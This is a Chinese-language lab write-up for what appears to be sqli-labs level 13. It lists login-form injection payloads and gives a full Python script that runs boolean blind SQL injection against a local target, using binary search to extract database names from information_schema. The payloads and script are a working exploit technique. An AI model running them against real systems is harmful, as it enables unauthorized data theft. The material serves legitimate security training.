和上道題基本相同 , 只是把雙引號改成單引號
還有值得注意的一點是 :
如何根據(jù)bool來判斷(上道題也是自己疏忽了)
可以通過頁面中顯示的那個圖片來判斷 , 而不必去判斷用戶名和密碼是否顯示出來
Bool盲注比較關(guān)鍵的一點也就是在尋找SQL語句是否成功執(zhí)行的線索
postDate = {"uname":"admin","passwd":"admin"}
postDate = {"uname":"'","passwd":"admin"}
postDate = {"uname":"')or 1-- ","passwd":"admin"}
postDate = {"uname":"')or ()-- ","passwd":"admin"}
#!/usr/bin/env python
# encoding:utf8
import requests
import time
import sys
# config-start
sleep_time = 5
error_time = 1
# config-end
def getPayload(indexOfResult, indexOfChar, mid):
# admin' or ()--
column_name="schema_name"
table_name="schemata"
database_name="information_schema"
payload = "((ascii(substring((select " + column_name + " from " + database_name + "." + table_name + " limit " + indexOfResult + ",1)," + indexOfChar + ",1)))>" + mid + ")"
payload = {"uname":"')or (" + payload + ")-- ","passwd":"admin"}
return payload
def exce(indexOfResult,indexOfChar,mid):
# content-start
url = "http://127.0.0.1/Less-13/"
postData = getPayload(indexOfResult,indexOfChar,mid)
content = requests.post(url, data=postData).text
# content-end
# judge-start
if "<img src=\"../images/flag.jpg\" />" in content:
return True
else:
return False
# judge-end
def doubleSearch(indexOfResult,indexOfChar,left_number, right_number):
while left_number < right_number:
mid = int((left_number + right_number) / 2)
if exce(str(indexOfResult),str(indexOfChar + 1),str(mid)):
left_number = mid
else:
right_number = mid
if left_number == right_number - 1:
if exce(str(indexOfResult),str(indexOfChar + 1),str(mid)):
mid += 1
break
else:
break
return chr(mid)
def search():
for i in range(32): # 需要遍歷的查詢結(jié)果的數(shù)量
counter = 0
for j in range(32): # 結(jié)果的長度
counter += 1
temp = doubleSearch(i, j, 0, 128) # 從255開始查詢
if ord(temp) == 1: # 當為1的時候說明已經(jīng)查詢結(jié)束
break
sys.stdout.write(temp)
sys.stdout.flush()
if counter == 1: # 當結(jié)果集的所有行都被遍歷后退出
break
sys.stdout.write("\r\n")
sys.stdout.flush()
search()
